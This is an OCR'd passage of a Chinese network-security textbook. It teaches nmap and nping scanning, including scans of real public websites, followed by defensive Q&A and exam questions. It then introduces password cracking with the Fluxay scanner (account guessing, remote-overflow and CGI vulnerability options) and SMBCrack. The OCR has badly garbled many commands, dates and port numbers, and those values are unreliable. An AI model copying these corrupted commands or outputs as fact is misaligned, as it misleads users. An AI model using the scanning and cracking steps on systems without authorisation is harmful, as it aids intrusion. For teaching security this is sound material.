参数 -sT 表示 使 用 TCP Connect 扫描 ,扫描 时 间 比 使 用 -sS 要 长 ; 参数 -sV 表示 版 本 


命令 提示 符 


:Onnap -sT 1 


Btarting Nnap 
ass_dns: warn 
Try using —s 
inap scan repo 
ost is up C@. 
ot shown: 987 
or STRT 
has/tcp open 
hi39/tep open 
45/tcp open 
B54/tcp open 
P869/tcp open 
F357/tep open 





92.168.5.1 
6.47 《 http://nnap.org 》 at 2817-83-29 11:28 中 国标 准时 间 可 
ing: Unable to deternine any DNS servers. Reverse DNS is disabled. 
ystem-dns or specify valid servers with —dns-servers 
Pt for 192.168.5.1 
BBs latency). 

filtered ports 
E SERVICE 

msrpc 

nethios-ssn 

microsoft-ds 

rtsp 

icslap 

wsdapi 本 





图 4-7 内 置 端口 扫描 


探测 ; 参数 -p 表示 只 扫描 指定 端口 ,如 图 4-8 所 示 。 


下 管理 员 : 命令 提 


:snmap -sT - 


Starting Nnap 
ass_dns: warn 
Try using —s 
Inap scan repo: 
ost is up CB. 
lot shown: 398 
p STRTE 
open 
open 
open 
Info: 


detect 
prg/submit/ . 
Inap done: 199 


示 符 
sU -p 199-598 192-168.5-1-199 


6.47 《 http://nnap.org 》 at 2917-83-39 99:16 中 国标 准时 间 
ing: Unable to deternine any DNS servers. Reverse DNS is disabled. 
ysten-dns or specify valid servers with 一 dns-seruers 

rt for 192.168.5.1 

00s latency). 

filtered ports 

SERUICE VERSION 

msrpe Microsoft Windows RPC 

nethios-ssn 

nethios-ssn 

O08: Windous; CPE: cpe:/o:microsoft:windows 


ion perforned. Please report any incorrect results at http://nnap. 





IP addresses (1 host up》 scanned in 39.33 seconds 到 


图 4-8 指定 端口 和 IP 进行 扫描 


(5) 获得 操作 系统 类 型 。 


C:\>nmap -oo — sS 192.168.5.1 


参数 -o 表示 启用 操作 系统 检测 。 


(6) 强制 扫描 。 
C:\>nmap 一 P0 - sT 


参数 -P0 表示 强制 
443 任务 3: 利用 


1. 任务 目标 


192.168.5.1 
对 主机 进行 扫描 ,无 论 是 否 能 Ping 通 。 
Kali Lnux 操 作 系 统 进 行 Nrep 扫 描 


利用 Kali Linux 操作 系统 进行 Nmap 扫描 。 


2. 工作 任务 


(1) Kali Linux 下 的 nmap 软件 包 的 安装 。 
(2) 识别 活跃 的 主机 。 
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(3) 查看 开放 的 端口 。 

(4) 查看 网 站 的 操作 系统 类 型 。 

(5) 查看 主机 开放 的 端口 号 和 操作 系统 类 型 。 
(6) 扫描 整个 网 段 主机 的 开放 端口 状态 。 

(7) 图 形 化 TCP 端口 扫描 工具 Zenmap 的 使 用 。 





3. 工作 环境 


- 台 预 装 Kali Linux 系统 的 





4. 实施 过 程 
(1) Kali Linux 下 的 nmap 软件 包 的 安装 ,具体 操作 命令 如 下 。 


root@kali:~# apt— get install nmap 


(2) 识别 活跃 的 主机 。 
@ 使 用 nmap 命令 查看 一 个 主机 是 否 在 线 ， 


:~# nmap -sP 192.168.232.129 





如 图 4-9 所 示 。 


Starting Nmap 7.25BETAl ( https://nmap.org ) at 2017-64-15 17:44 CST 
Nmap scan report for 192.168.232.129 

Host is up (9.969668s latency). 

MAC Address: 66:6C:29:B6:65:58 (VMware) 

Nmap done: 1 IP address (lihost up) scanned in 60.25 seconds 


4-9 使 用 nmap 命令 查看 主机 是 否 在 线 





@ 从 输出 的 信息 中 可 以 看 到 192. 168. 232. 129 主机 的 域名 、 主 机 是 否 在 线 和 MAC 
地 址 等 信息 。 
@ 也 可 以 使 用 nping 命令 查看 一 个 主机 是 否 在 线 并 获取 更 多 详细 信息 ,如 图 4-10 所 示 。 


:=#nping --echo-client "public” echo,nmap.org 





Starting Nping 6.7.25BETAI ( Https://nmap.org/nping ) at 2017-84-15 17:45 CST 
SENT (7.9715s) ICMP [192.168.232.128 > 45.33.32.156 Echo request (type=8/code=0| 
]_IP [ttl=64 id=21108 iplen=28 ] 
7.2653s) ICMP [45.33.32.156 > 192.168.232.128 Echo reply (type=6/code=6) 
id-4622 seq=1] IP [tt=28 id24935]iipten<28 ] 
SENT (8.6729s) ICMP-1192.168.232.128 > ,45.33.32.156 Echo request (type=8/code=| 
) id=4622 seq=3] IP [ttl=64 id=21198 iplen=28 ] 
RCVD (8.2634s) ICMP [45.33.32.156 > 192.168.232.128 Echo reply (type=8/code=0) 
3] IP [ttt=128 id=46352 iptens28 ] 
2s) ICMP [192.168.232.128 > 45.33.32.156 Echo request (type=8/code=l| 
) id=4622 seq=3] IP [ttl=64 id=21168 iplen=28 ] 
RCVD (9.2642s) ICMP [45.33.32.156 > 192.168.232.128 Echo reply (type=6/code=6) 
2 3] IP [ttt=128 id=49353 ipten=28 ] 
SENT (19.0758s) ICMP [192.168.232.128 > 45.33.32.156 Echo request (type=8/code= 
2 seq=4] IP [ttl=64 id=21168 ipten=28 ] 
.2692s) ICMP [45.33.32.156 > 192.168.232.128 Echo reply (type=6/code=6) 
seq=4] IP [ttl=128 id=46354 iplen=28 ] 
SENT (11.9799s) ICMP [192.168.232.128 > 45.33.32.156 Echo request (type=8/code= 
6) id=4622 seq=5] IP [ttl=64 id=21198 ipten=28 ] 
RCVD (11.2763s) ICMP [45.33.32.156 > 192.168.232.128 Echo reply (typ 
id=4622 seq=5] IP [ttl=128 id=49355 iplen=28 ] 


Max rtt: 193.458ms | Min rtt: 199.359ms | Avg rtt: 191.81lms 
Raw packets sent: 5 (149B) | Rcvd: 5 (238B) | Lost: © (9.60%)| Echoed: 6 (6B) 
Nping done: 1 IP address pinged in 12.19 seconds 





图 4-10 使 用 nping 命令 查看 主机 是 否 在 线 并 获取 更 多 信息 
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@ 输出 的 信息 显示 了 与 echo. nmap. org 网 站 连接 时 数据 的 
的 时 间 、 接 收 时 间 、TTL 值 和 往返 时 间 等 。 
@ 也 可 以 发 送 一 些 十 六 进 制 数 据 到 指定 的 端口 ,如 图 4-11 所 示 。 


:~# nping -tcp -p 445 -data AF56A43D 192.168.232.129 


送 情 况 , 如 发 送 数 据 包 





Starting Nping 9.7.25BETA1 ( https://nmap.org/nping ) at 2917-94-]15 17:48 CST 
SENT (0.6461s) TCP 192.168.232.128:23499 > 192.168.232.129:445 S ttt=64 id=4981 
3 ipLen=44 Seq=159786999 w 489 

SENT (1.0499s) TCP 192.168.232.128:23499 .168.232.129:445 5 ttl=64 id=4981 
3 iplen=44 seq=159786999 win=1480 

SENT (2.06552s) TCP 192.168.232.128:23499 .168.232.129:445 5 ttl=64 id=4981 
3 iplen=44 Seq=159786999 win=1486 

SENT (3.9576s) TCP 192.168.232.128:23499 92.168.232.129:445 5 ttl=64 id=4981| 
3 ipLen=44 Seq=159786999 win=1486 

SENT (4.9596s) TCP 192.168.232.128:23499 .168.232.129:445 5 ttl=64 id=4981 
3 ipLen=44 seq=159786999 win=1489 


Max rtt: MA | Min rtt: N/A | Avg rtt: N/A 
Raw packets sent: 5 (2269B) | Rcvd: 6 (9B) | Lost: 5 (199.960%) 
Nping done: 1 IP address pinged in 5.98 seconds 








4-11 使 用 nping 命令 发 送 数据 到 端口 


@ 输出 的 信息 显示 了 本 地 主机 与 目标 系统 192. 168 . 129 之 间 TCP 传输 过 程 。 
通过 发 送 数据 包 到 指定 端口 模拟 出 一 些 常见 的 网 络 层 攻 击 , 以 验证 目标 系统 对 这 些 测试 
的 防御 情况 。 

(3) 查看 开放 的 端口 。 

@ 使 用 nmap 命令 查看 目标 主机 192. 168. 232. 129 上 开放 的 端口 号 ,如 图 4-12 所 示 。 








:~# nmap 192.168.232.129 


Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2617-64-15 17:49 CST 
Nmap scan report for 192.168.232.129 
Host is up (6.99647s latency). 
Not shown: 998 filtered ports 
PORT STATE SERVICE 
ftp 
http 
966:6C:29:B6:95:58 (VMware) 





: 1 IP address (1 host up) scanned in 4.93 seconds 
图 4-12 查看 目标 主机 上 开放 的 端口 


@ 输出 的 信息 显示 了 主机 192. 168. 232. 129 上 开放 的 所 有 端口 ,如 21、80 等 。 
@ 如 果 目 标 主机 上 打开 的 端口 较 多 时 ,查看 起 来 可 能 有 点 困难 ,可 以 指定 扫描 的 端 
口 范围 ,如 指定 扫描 端口 号 在 1 一 50 之 间 , 如 图 4-13 所 示 。 
:~# nmap -p 1-56 192.168.232.129 


Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2917-94-15 17:51 CST 
Nmap scan report for 192.168.232.129 

Host is up (6.66911s Latency) . 

Not shown: 49 filLtered ports 

PORT STATE SERVICE 

21/tcp open ftp 

MAC Address: 99:6C:29:B6:95:58 (VMware) 





Nmap done: 1 IP address (1 host up) scanned in 11.91 seconds 


图 4-13 查看 目标 主机 上 指定 范 





内 开放 的 端口 
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@ 输出 的 信息 显示 了 主机 上 端口 在 1 一 50 之 间 所 开放 的 端口 号 。 
@ 也 可 以 指定 扫描 在 192. 168. 232. 0/24 网 段 内 所 有 开放 TCP 端口 21 的 主机 ,如 
图 4-14 所 示 。 





# nmap -p 21 192.168.232.* 


Starting Nmap 7.25BETANI( https://nmap.org ) at 2617-94-15 17:53 CST 
Nmap scan report for 192.168.23281 

host is up (6.96638s Latency) 

PORT STATE SERVICE 

Pa7tEP filtered ftp 

MAC Address: 06:50:56:C9:00:08 (Vware) 


Nmap scan report for 192.168.232.2 
cy 
STATE SERVICE 
lz21/tcp closed ftp 
MAC Address: 69:59:56:F5:E2:B1 (VMware) 


Nmap scan report for 192.168.232.129 
latency). 
STATE SERVICE 
21/tcp open ftp 
MAC Address: 69:6C:29:B8:65:58 (VMware) 


Nmap scan report for 192.168.232.130 
Host is up (6.99646s latency) 

PORT ”STATE SERVICE 

21/tcp closed ftp 

[ 5: 99:6C:29:96:46:88 (VMware) 


Nmap scan report for 192.168.232.254 
Host is up (6.69629s Latency) . 

PORT ”STATE 。 SERVICE 

21/tcp filtered ftp 

MAC Address: 66:56:56:FA:9E:39 (VMware) 


Nmap scan report for 192.168.232.128 
lHost is up (6.9696641s latency) 

PORT ”STATE SERVICE 

21/tcp closed ftp 





图 4-14 扫描 网 段 内 所 有 开放 指定 端口 的 主机 





@ 输出 的 结果 显示 了 192. 168. 232. 0/24 网 段 内 所 有 开放 21 号 端口 的 主 
输出 的 信息 可 以 看 到 总 共有 6 台 主 机 打开 了 21 号 端口 。 
@ 使 用 如 图 4-15 所 示 的 命令 查看 网 站 的 详细 信息 


:~# nmap -Vv www.sdpt .com:en 





沁 信 息 , 从 





Starting Nmap 7.25BETA1 ( httpss//nmap.org ) at 2017-94-15 12:25 CST 
Initiating Ping Scan at ”12:25 

Scanning www.sdpt:com.cn (218.13.33.168) [4 ports] 

Completed Ping Scan at 12:25, 0.03s elapsed (1 total hosts) 
Initiating Parallel DNS resolution of 1 host. at 12:25 

Completed Parallel DNS resolution of 1 host. at 12:25, 0.03s elapsed 
Initiating SYN Stealth Scan at 12:25 

Scanning www.sdpt.com.cn (218.13.33.168) [1988 ports] 

Discovered open port 86/tcp on 218.13.33.168 

Completed SYN Stealth Scan at 12:26, 4.01s elapsed (1996 total ports) 
Nmap scan report for www.sdpt.com.cn (218.13.33.168) 

Host is up (09.6085s latency) 

Not shown: 999 filtered ports 

PORT STATE SERVICE 

86/tcp open http 


Read data files from: /usr/bin/../share/nmap 
Nmap done: 1 IP address (1 host up) scanned in 9.21 seconds 
Raw packets sent: 2696 (88.228KB) | Revd: 4 (164B) 





图 4-15 查看 网 站 的 详细 信息 

































(4) 使 用 如 图 4-16 所 示 的 命令 扫描 一 个 网 站 ,查看 此 Web 服务 器 使 用 的 操作 系统 
=# nmap -5S9 -0 www.baidu.com 
Starting Nmap 7.25BETAl (https://nmap.org ) at 2017-84-14 11:56 CST 
Nmap scan report for www.baidu.com (111.13.166.92) 
Host is up _ (6.926s Latency) . 
Other addresses for www.baidu.com (not scanned): 111.13.196.91 
Not shown: 998 filtered ports 
PORT STATE SERVICE 
86/tcp open http 
443/tcp open https 
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1| 
cLosed port 
Aggressive 05 guesses: Brother MFC-7826N printer (94%), Digi Connect ME serial-to-Ethernel 
t bridge (94%), Netgear SC161 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoI 
P switch (91%), Aastra 486i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 673| 
li VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%) 
, GoPro HER03 camera (91%), Konica Minolta bizhub 256 printer (91%), OUYA game console (9 
1%) 
No exact 05 matches for host (test conditions non-ideal) 
05 detection performed. PLease report any incorrect results at https:Mnmap.org/Ssubmit/ . 
Nmap done: 1 IP address (1 host up) scanned in 48.77 seconds 
图 4-16 查看 Web 服务 器 使 用 的 操作 系统 类 型 
(5) 使 用 如 图 4-17 所 示 的 命令 测试 某 台 主机 开放 的 端口 ,如 自己 的 计算 机 。 
:~# nmap -55 -0 192.168.72.128 
Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2617-94-14 12:93 CST 
Nmap scan report for 192.168.72.128 
Host is up (8.9966948s Latency) . 
Not shown: 998 closed ports 
PORT STATE SERVICE 
22/tcp open ssh 
86/tcp open http 
Device type: general purpose 
Running: Linux 3.X|4.X 
0S CPE: cpe:/o:Linux:Linux kernel:3 cpe:/0:linux:linux kernel:4 
05 details: Linux 3.8 - 4.5 
Network Distance: 9 hops 
05 detection performed. Please report any incorrect results at https://nmap. 
org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 2.16 seconds 
图 4-17 测试 主机 开放 的 端口 
(6) 使 用 如 图 4-18 所 示 的 命令 扫描 一 个 网 段 ,查看 所 有 计算 机 安装 了 何 种 操作 
系统 。 
(7) 图 形 化 TCP 端口 扫描 工具 Zenmap 的 使 用 
OO 在 Kali Linux 图 形 界面 中 ,选择 “应 用 程序 ”信息 收集 ”一 Zenmap 命令 ,在 打开 
的 窗口 中 的 “目标 ”文本 框 中 输入 目标 主机 地 址 ,在 “配置 ”文本 框 中 选择 扫描 类 型 ,设置 完 
扫描 ”按钮 ， 扫描 4 果 如 图 4-19 所 示 。 
@ 该 界面 显示 了 68. 232. 129 主机 启动 的 所 有 端口 信息 ,在 左 侧 栏 中 可 以 
切换 以 主机 或 服务 的 i 显示 详细 扫描 结果 ,在 右 侧 栏 中 ,可 以 分 别 查 看 Nmap 输出 信 


息 、 端 口 / 





主机 、 拓 扑 结构 、 主 机 详细 信息 和 扫描 信息 等 








sr# mmap -5S -0 192.168.72.0/24 


Starting Nmap 7.25BETAlL (https://nmap.org ) at 2017-94-14 12:96 CST 
Nmap scan report for 192.168.72.1 
Host is up (9560658s latency). 
Not shown: 993 filtered ports 

STATE SERVICE 

open msrpc 

open netbios-ssn 
445/tcp open microsoft-ds 
1861/tcp open msmq 
2163/tcp open zephyr-clt 
2195/tcp open eklogin 
2197/tcp open msmq-mgmt 
MAC Address: 66:56:56:C6:66:08 (VMware) 
Warning: OSScan results may be unreliable because We could not find at least 
1 open and 1 closed port 
Aggressive 05 guesses: Microsoft Windows Phone 7.5 or 8.0 (94%), Microsoft Wl 
indows 16 build 10586 (93%), Microsoft Windows Server 2668 R2 or Windows 8.1]| 
(93%), Microsoft Windows 7 Professional or Windows 8 (93: Microsoft Windol 
ws Vista SP6 or SP1, Windows Server 2698 SP1, or Windows 7 (93%), Microsoft 
Windows Embedded Standard 7 (93%), Microsoft Windows Vista SP2, Windows 7 SP 
1, or Windows Server 2668 (93%), Microsoft Windows Server 2698 R2 (91%), Mic 
rosoft Windows Server 2088 SP1 (91%), Microsoft Windows 7 (91%) 
No exact 05 matches for host (test conditions non-ideal). 
Network Distance: 1 hop 





4-18 查看 网 段 中 所 有 计算 机 安装 的 操作 系统 





Zenmap Ge 
扫描 (a) 工具 (T) 配置 (P) 帮助 (H) 
目标 [192.168.232.130 | ，| 配置: |intense scan v | | 扫描 | | 区 次 


傅 今 :|nmap -T4 -A -v 192.168.232.130 | 





主机 服务 Nmap 输 出 | 端口 /主机 拓扑 主机 明细 扫描 
操作 系统 ” 主机 。 | nmap -T4-A-v 192.168.232.130 了 | 


要 EEC Nmap scan report for 192.168.232.130 本 
Host is up (9.69962s Latency) . 
Not shown: 996 closed ports 
PORT STATE SERVICE VERSION 
135/tcp open msrpc Microsoft 
Windows RPC 
139/tcp open netbios-ssn Microsoft 
Windows netbios-ssn 
445/tcp open microsoft-ds Windows 7 
Professional 7691 Service Pack 1 microsoft-ds 








1925/tcp open msrpc Microsoft 
Windows RPC 
1926/tcp open msrpc Microsoft 
Windows RPC 
1927/tcp open msrpc Microsoft 
Windows RPC 
1628/tcp open msrpc Microsoft 
Windows RPC 
1929/tcp open msrpc Microsoft 
Windows RPC 
1939/tcp open msrpc Microsoft 


Windows RPC 

3389/tcp open tcpwrapped 

| ssl-cert: Subject: commonName=WIN- 
HRHU9CJOECT 

| 过 滤 主 机 | Issuer: commonName=WIN-HRHU9CJOECT 本 


图 4-19 扫描 界面 


[IE | 页 目 4 漏洞 扫描 ] Ke > 


1. 扫描 的 作用 是 什么 ? 

答 : 通过 扫描 结果 ,可 以 看 到 在 计算 机 上 开放 了 哪些 端口 .启动 了 哪些 服务 。 如 果 看 
到 一 些 显示 为 未 知 的 或 看 上 去 可 疑 的 服务 ,那么 可 以 记 下 它 的 端口 号 ,然后 通过 谷歌 或 百 
度 等 搜索 引擎 进行 搜索 ,看 看 这 个 端口 具体 是 干什么 的 。 

2. 如 何 关闭 端口 ? 如 何 操作 ? 

答 : 在 计算 机 上 有 些 开放 的 端口 可 能 是 应 用 程序 所 需要 的 ,但 如 果 有 些 开放 端口 是 
不 必要 的 ,例如 有 些 服务 是 以 前 有 用 而 现在 已 经 不 用 的 ,那么 停止 这 些 服 务 ,从 而 关闭 相 
应 的 开放 端口 ,减少 安全 隐患 。 从 控制 面板 的 管理 工具 中 打开 “服务 "管理 窗口 ,找到 需要 
关闭 的 服务 ,将 其 启动 类 型 改 为 “禁用 ”, 然 后 停止 这 个 服务 。 

3. 如 何 屏蔽 139 端口 ? 

答 : 139 端口 可 以 通过 禁用 NetBIOS 来 屏蔽 ,在 “网 络 连接 ”窗口 中 右 击 “本 地 连接 ” 
图 标 , 在 弹出 的 “本 地 连接 属性 ”对 话 框 中 选择 “Internet 协议 (TCP/IP)” 选 项 , 单 击 “ 属 
性 ”按钮 ,打开 “Internet 协议 (TCP/IP) 属 性 ”对 话 框 ,在 该 对 话 框 中 单 击 “ 高 级 ”按钮 ,在 
“高 级 TCP/IP 设置 "对话 框 中 选择 WINS 选项 卡 , 选 择 * 禁 用 TCP/IP 上 的 NetBIOS” 单 
选 按 钮 ,最 后 依次 单 击 “ 确 定 ” 按 钮 ,应 用 设置 即 可 。 

4. 如 何 防 止 黑 客 的 扫描 ? 

答 : 安装 防 病毒 软件 及 防火 墙 ,并 经 常 及 时 升级 病毒 库 , 防 止 有 破坏 性 程序 的 注入 ; 
使 用 最 新 版 本 的 浏览 器 软件 .电子 邮件 软件 及 其 他 程序 ; 不 要 轻易 打开 来 历 不 明 的 电子 
邮件 或 软件 ,因为 它 可 能 包含 后 门 程序 或 其 他 有 害 程序 ; 在 使 用 QQ、MSN 等 聊天 工具 
时 ,不 要 轻易 同意 陌生 人 加 自己 为 好 友 ; 使 用 可 以 对 Cookie 进行 控制 的 安全 程序 ,因为 
Cookie 有 时 会 泄露 用 户 的 一 些 个 人 隐私 ; 经 常 查找 自己 计算 机 中 存在 的 漏洞 ,并 下 载 安 
装 这 些 漏 洞 补丁 ,防止 黑客 利用 这 些 漏洞 进行 攻击 。 


4.6 认证 试题 
一 、 选 择 题 
本 ) 能 够 阻止 外 部 主机 对 本 地 计算 机 的 端口 扫描 。 
A. 杀 病 毒 软件 
B. 个 人 防火 墙 
C. 基于 TCP/IP 的 检查 攻击 ,如 netstat 
D. 加 密 软 件 


2. 关于 网 络 安全 ,以 下 说 法 正确 的 是 ( )。 
A. 使 用 无 线 传输 可 以 防御 网 络 监听 
B. 木马 是 一 种 蠕虫 病毒 
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C. 使 用 防火 墙 可 以 有 效 地 防御 病毒 
D. 冲击 波 病毒 利用 Windows 的 RPC 漏洞 进行 传播 
3. 网 络 型 安全 漏洞 扫描 器 的 主要 功能 有 ( Xs 


A. 端口 扫描 检测 B. 后 门 程序 扫描 检测 
C. 密码 破解 扫描 检测 D. 应 用 程序 扫描 检测 
E. 系统 安全 信息 扫描 检测 F. 以 上 全 是 

二 、 判 断 题 


通常 采用 port scan 可 以 比较 快速 地 了 解 某 台 主机 上 提供 了 哪些 网 络 服务 。( ) 
三 、 简 答题 


1. 常用 的 扫描 器 有 哪些 ? 
2. 端口 扫描 分 为 哪 几 类 ? 扫描 器 的 工作 原理 是 什么 ? 


5.1 用 户 需 求 与 分 析 


如 果 黑 客 已 经 找到 目标 主机 ,在 攻击 过 程 中 一 般 都 会 对 计算 机 系统 的 登录 账号 和 密 
码 进行 破解 ,以 便 使 用 这 些 账 号 和 登录 密码 进入 目标 主机 系统 ,从 而 控制 目标 主机 。 


5.2 预备 知识 


5 2 1 密码 破解 的 意义 


为 了 安全 ,现在 几乎 所 有 的 系统 都 通过 访问 控制 来 保护 自己 的 数据 。 访 问 控制 最 常 
用 的 方法 就 是 密码 保护 。 密 码 应 该 说 是 用 户 最 重要 的 一 道 防 护 门 , 如 果 密 码 破解 了 ,那么 
用 户 的 信息 将 很 容易 被 窃取 。 因 此 密码 破解 也 是 黑客 人 侵 系 统 比较 常用 的 方法 。 或 者 当 
公司 的 某 个 系统 管理 员 离开 企业 而 其 他 人 都 不 知道 该 管理 员 账 号 的 密码 时 ,企业 可 能 会 
雇佣 专业 技术 人 员 来 破解 管理 员 密 码 。 


5 22 获取 用 户 密码 的 方法 


一 般 入 侵 者 常常 通过 下 面 几 种 方法 获取 用 户 的 密码 ,包括 暴力 破解 ,Sniffer 密码 嗅 
探 \ 木 马 程序 或 键盘 记录 程序 等 手段 。 有 关系 统 用 户 账号 密码 的 暴力 破解 主要 是 基于 密 
码 匹配 的 破解 方法 ,最 基本 的 方法 有 两 种 : 穷 举 法 和 字典 法 。 穷 举 法 是 效率 最 低 的 方法 ， 
将 字符 或 数字 按照 穷 举 的 规则 生成 密码 字符 串 ,进行 遍历 尝试 。 在 密码 稍微 复杂 的 情况 
下 , 穷 举 法 的 破解 速度 很 低 。 字 典 法 相对 来 说 较 高 .用 密码 字典 中 事先 定义 的 常用 字符 去 
尝试 匹配 密码 。 密 码 字 典 是 一 个 很 大 的 文本 文件 ,可 以 通过 自己 编辑 或 者 由 字典 工具 生 
成 ,里 面包 含 了 单词 或 者 数字 的 组 合 。 如 果 密 码 是 一 个 单词 或 者 是 简单 的 数字 组 合 ,那么 
破解 者 就 可 以 很 轻易 地 破解 密码 。 

常用 的 密码 破解 工具 有 很 多 ,通过 这 些 工 具 的 使 用 ,可 以 了 解密 码 的 安全 性 ,下 面 介 
绍 几 种 最 常见 的 工具 软件 。 随 着 网 络 黑客 攻击 技术 的 增强 和 提高 ,很 多 密码 都 可 以 被 攻 
击 和 破译 ,这 就 要 求 用 户 提高 对 密码 安全 的 认识 。 
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1. 流光 扫描 器 简介 


流光 扫描 器 是 黑客 必 备 的 扫描 器 之 一 , 它 除 了 可 以 扫描 系统 安全 漏洞 、 弱 密码 之 外 ， 
还 集成 了 常用 的 人 侵 字 典 , 如 字典 工具 .NTVIIS 工具 等 ,并 且 独 创 了 能 够 控制 “肉鸡 ? 进 
行 扫描 的 流量 Sensor 工具 和 为 “肉鸡 ?安装 服务 的 “种 植 者 工具。 流光 扫描 器 的 功能 较 
多 ,所 以 操作 也 较 复 杂 , 并 且 其 功能 还 在 进一步 扩充 。 流 光 扫描 器 的 作者 为 了 防止 该 工具 
用 于 非法 目的 , 非 注册 版 对 其 使 用 功能 进行 了 限制 , 且 不 能 扫描 国内 的 IP 地 址 。 


2. SMBCrack 工具 软件 简介 


SMBCrack 是 基于 Windows 操作 系统 的 密码 破解 工具 ,是 小 榕 软件 为 流光 扫描 器 开 
发 的 测试 原型 ,与 以 往 的 SMB( 共 享 ) 暴 力 破 解 工具 不 同 , 没 有 采用 系统 的 API, 而 是 使 用 
了 SMB 的 协议 。 因 为 Windows 可 以 在 同一 会 话 内 进行 多 次 密码 探测 , 所 以 用 
SMBCrack 可 以 破解 操作 系统 的 密码 。 





5.3 方案 设计 
方案 设计 如 表 5-1 所 示 。 
表 5-1 方案 设计 
任务 名 称 密码 破解 
1. 使 用 流光 扫描 器 探测 目标 主机 
(1) 使 用 流光 扫描 器 探测 目标 主机 


任务 分 解 | 。 (2) 使 用 流光 扫描 器 制作 黑客 字典 


2. 使 用 SMBCrack 进行 密码 破解 





1. 能 使 用 流光 扫描 器 探测 目标 主机 
能 力 目标 2. 能 使 用 流光 软件 制作 黑客 字典 
3. 能 使 用 SMBCrack 工具 软件 进行 密码 破解 





1. 了 解密 码 破解 的 意义 

2. 熟悉 获取 用 户 密码 的 方法 

3. 了 解 流光 扫描 器 的 作用 

4. 了 解 SMBCrack 工具 软件 的 作用 


知识 目标 





1. 培养 良好 的 职业 道德 

2. 具有 良好 的 团队 协作 和 沟通 交流 能 力 
素质 目标 3. 掌握 网 络 安全 行业 的 基本 情况 

4. 培养 创新 能 力 

5. 树立 较 强 的 安全 \ 节 约 、 环 保 意 识 








5.4 项 目 实 施 
541 任务 1: 使 用 流光 扫描 器 探测 目标 主机 


1. 任务 目标 

通过 流光 扫描 器 的 使 用 .了 解 账户 的 安全 性 ,掌握 安全 密码 的 设置 原则 ,以 保护 账户 
密码 的 安全 。 

2. 工作 任务 


(1) 使 用 流光 扫描 器 探测 目标 主机 。 
(2) 使 用 流光 扫描 器 制作 黑客 字典 。 


3. 工作 环境 


(1) 两 台 预 装 Windows 7 系统 的 主机 ,通过 网 络 相 连 。 

(2) 软件 工具 : 流光 扫描 器 软件 。 

4. 实施 过 程 

(1) 使 用 流光 扫描 器 探测 目标 主机 。 双 击 从 网 上 下 载 的 安装 文件 ,启动 其 安装 向 导 
进行 安装 。 

@ 双击 桌面 上 的 Fluxay 图 标 , 即 可 进入 操作 界面 ,如 图 5-1 所 示 。 


日 口 筹 旧 标 主机 
口 加 Por3 主 机 


口 Imap 主机 
口传 FrP 主机 
口 @ HTP 主机 





小 相 软 件 实验 室 1995-2002 小 榨 作 品 版 权 所 有 





4 到 
[| RP | 4 |[ 交 E | WE | 
图 5-1 流光 扫描 器 操作 界面 
@ 选择 “文件 ”一 “高 级 扫描 向 导 ” 命 令 , 在 打开 的 对 话 框 中 设置 起 始 IP 地 址 和 结束 
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IP 地 址 ,并 可 在 “目标 系统 "下拉 列表 中 选择 预 检测 的 操作 系统 类 型 。 单 击 “ 获 取 主 机 名 ” 
和 “PING 检查 ”按钮 ,使 其 处 于 选中 状态 ,如 图 5-2 所 示 。 





EE 


起 妃 地 址 |192. 168.5.1 

睹 束 地 址 [92. 165.5 .10 

目标 系统 : |ALL 己 
加 获取 主机 名 








ET Hw | Py | 
图 5-2 设置 IP 地址 范围 及 检测 项 目 


@ 单 击 " 下 一 步 " 按 钮 ,选取 “标准 端口 扫描 "选项 ,从 而 只 对 常用 端口 进行 扫描 ,如 
图 5-3 所 示 。 





PORTS x 


和 礁 匡 口 扫 揪 




















Ke] eX J 9 | 
图 5-3 ”设置 扫描 端口 范围 


@ 单 击 “ 下 一 步 ” 按 钮 ,选取 “获取 POP3 版 本 信息 ”及 “尝试 猜 解 用 户 ? 选 项 ,如 图 5-4 
所 示 。 

@ 单 击 “ 下 一 步 ”按钮 ,设置 有 关 FTP 检测 的 有 关 选 项 ,如 图 5-5 所 示 。 

@@ 单 击 “ 下 一 步 ”按钮 ,设置 有 关 SMTP 检测 的 有 关 选 项 ,如 图 5-6 所 示 。 

@ 单 击 “ 下 一 步 ”按钮 ,设置 有 关 IMAP 检测 的 有 关 选 项 ,如 图 5-7 所 示 。 

@ 单 击 “下 一 步 " 按 钮 ,设置 Telnet 远程 溢出 等 选项 ,如 图 5-8 所 示 。 

回 单 击 “下 一 步 ?按钮 ,在 对 话 框 中 设置 CGI 的 有 关 检 测 选 项 ,如 图 5-9 所 示 。 

四 单 击 “下 一 步 "按钮 ,在 CGI 规则 设置 对 话 框 中 选择 需要 扫描 的 CGI 漏洞 选项 ,如 
图 5-10 所 示 。 





因 医 天 F053 乒 本 祖 站 | 
国 差 试 清 解 用 户 








5-4 设置 POP3 检测 选项 











图 5-5 设置 FTP 检测 选项 


[su 








< 上- [Fw | 大 | 








图 5-6 设置 SMTP 检测 选项 








RE 
尝试 猜 解 用 户 帐号 











5-7 设置 IMAP 检测 选项 





ET 可 





3 
Sun0s Login 远程 道 出 








| | 


图 5-8 设置 Telnet 远程 溢出 选项 





cor 司 





根据 版 本 决定 采用 IT 或 者 UNTI 方 式 
只 有 HTTP 200/502 有 效 








< 上 了 家 





图 5-9 选择 CGI 有 关 选 项 
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322 
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广 Tbeot ini 


ER 
lel er | 
图 5-10 ”CGI 漏洞 选项 


@ 单 击 “ 下 一 步 "按钮 ,对 装 有 SQL 数据 库 的 系统 进行 有 关 漏 洞 扫描 选项 的 设置 ,如 
图 5-11 所 示 。 


一 








< 上 ~ 步 @) 取消 二 





图 5-11 设置 SQL 扫描 选项 
四 单 击 “下 一 步 ? 按 钮 ,可 以 设置 有 关 共 享 资源 及 用 户 名 猜 解 的 扫描 等 选项 , 如 

图 5-12 所 示 。 
ic 车 





忆 对 kanini straotors 扯 进行 攻 解 








《上 一 步 四 ) 取消 堵 卫 








图 5-12 共享 资源 扫描 等 选项 设置 





Co | 网 络 安全 部 署 ( 第 人 ) | 


加 单 击 * 下 一 步 按 钮 ,用 户 可 以 设置 IIS 服务 器 的 有 关 漏 洞 检测 选项 ,如 图 5-13 
所 示 。 














